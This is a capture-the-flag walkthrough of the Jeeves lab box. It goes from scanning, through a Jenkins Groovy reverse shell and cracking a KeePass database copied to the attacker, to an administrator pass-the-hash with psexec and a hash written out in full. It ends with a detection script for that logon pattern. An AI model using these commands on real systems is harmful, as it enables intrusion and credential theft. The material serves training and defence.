Ping

Nmap default Scan
nmap 10.10.10.63 -oN dnmap

Nmap Script and Service scan
nmap 10.10.10.63 -sV -sC -A -oN snmap

Nmap All Port Scan
nmap -p- --min-rate 10000 10.10.10.63 -oN anmap

Directory enumeration using ffuf
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.63:50000/FUZZ -t 100 -o ffuf.txt
Nothing interesting on port 80, so I go with port 50000 and find a directory /askjeeves
Will try that directory
Cool, we got something
There is a Build Executor Status > master > Script Console (the Jenkins script console)
Will run a Groovy script to get a reverse shell: https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76
Modified the script with my IP and port
Run it.
Got reverse shell

Got user.txt

Will jump to Privilege Escalation…!
Will check our privileges
whoami /priv
Got the impersonation privilege, Cooool…!
System Info

User Info

Will search for any interesting files
dir /S C:\users\*.kdbx *.log *.ini *.txt *.conf
Found .kdbx file
Will transfer it to our Kali using the SMB share we already established
copy C:\Users\kohsuke\Documents\CEH.kdbx \\10.10.14.2\kali

Received

I tried to open it, but it asks for a password, so I will crack it using john
keepass2john CEH.kdbx > ceh.hash
john --wordlist=/usr/share/wordlists/rockyou.txt ceh.hash
Got it…!
Will open the file now


There is an NTLM hash; will try it for the Administrator account with pass-the-hash using psexec (Impacket)

Will copy that and use it to pass the hash
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 administrator@10.10.10.63
We are admin now…!
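As an added detection-side example (not part of the original write-up): the pass-the-hash step above leaves a distinctive trace on the target, an NTLM network logon (Security event 4624, logon type 3) followed seconds later by a new service being installed (System event 7045), which is how PsExec-style tools execute. The script below correlates constructed sample records in that shape; the field names, service name and binary name are assumptions, not values taken from the box.

```python
import json
from datetime import datetime, timedelta

# Constructed sample events (not real logs from the box). Field names are
# assumptions, loosely mirroring the Windows Security (4624) and System (7045)
# event data; 10.10.14.2 is the attacker address used in the write-up.
SAMPLE_EVENTS = [
    {"time": "2018-01-10T10:00:01", "id": 4624, "host": "JEEVES",
     "user": "kohsuke", "logon_type": 2, "auth_pkg": "Negotiate", "src_ip": "-"},
    {"time": "2018-01-10T10:05:10", "id": 4624, "host": "JEEVES",
     "user": "Administrator", "logon_type": 3, "auth_pkg": "NTLM",
     "src_ip": "10.10.14.2"},
    {"time": "2018-01-10T10:05:12", "id": 7045, "host": "JEEVES",
     "service": "rLwXp", "image": r"%systemroot%\xyzQ.exe"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def find_pth_psexec(events, window_s=60):
    """Flag an NTLM network logon (4624, type 3) that is followed within
    window_s seconds by a service installation (7045) on the same host.
    That pairing is what a PsExec-style pass-the-hash session leaves behind."""
    events = sorted(events, key=_ts)
    installs = [e for e in events if e["id"] == 7045]
    alerts = []
    for logon in events:
        if logon["id"] != 4624 or logon["logon_type"] != 3:
            continue
        if logon["auth_pkg"].upper() != "NTLM":
            continue
        deadline = _ts(logon) + timedelta(seconds=window_s)
        for svc in installs:
            if svc["host"] == logon["host"] and _ts(logon) <= _ts(svc) <= deadline:
                alerts.append({
                    "host": logon["host"], "user": logon["user"],
                    "src_ip": logon["src_ip"], "service": svc["service"],
                    "image": svc["image"], "logon_time": logon["time"],
                })
    return alerts


if __name__ == "__main__":
    for alert in find_pth_psexec(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Legitimate remote administration produces the same pair, so in practice the window is tuned and known management tooling is allow-listed by service name or image path.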
Will search for root.txt

Done with Jeeves…:)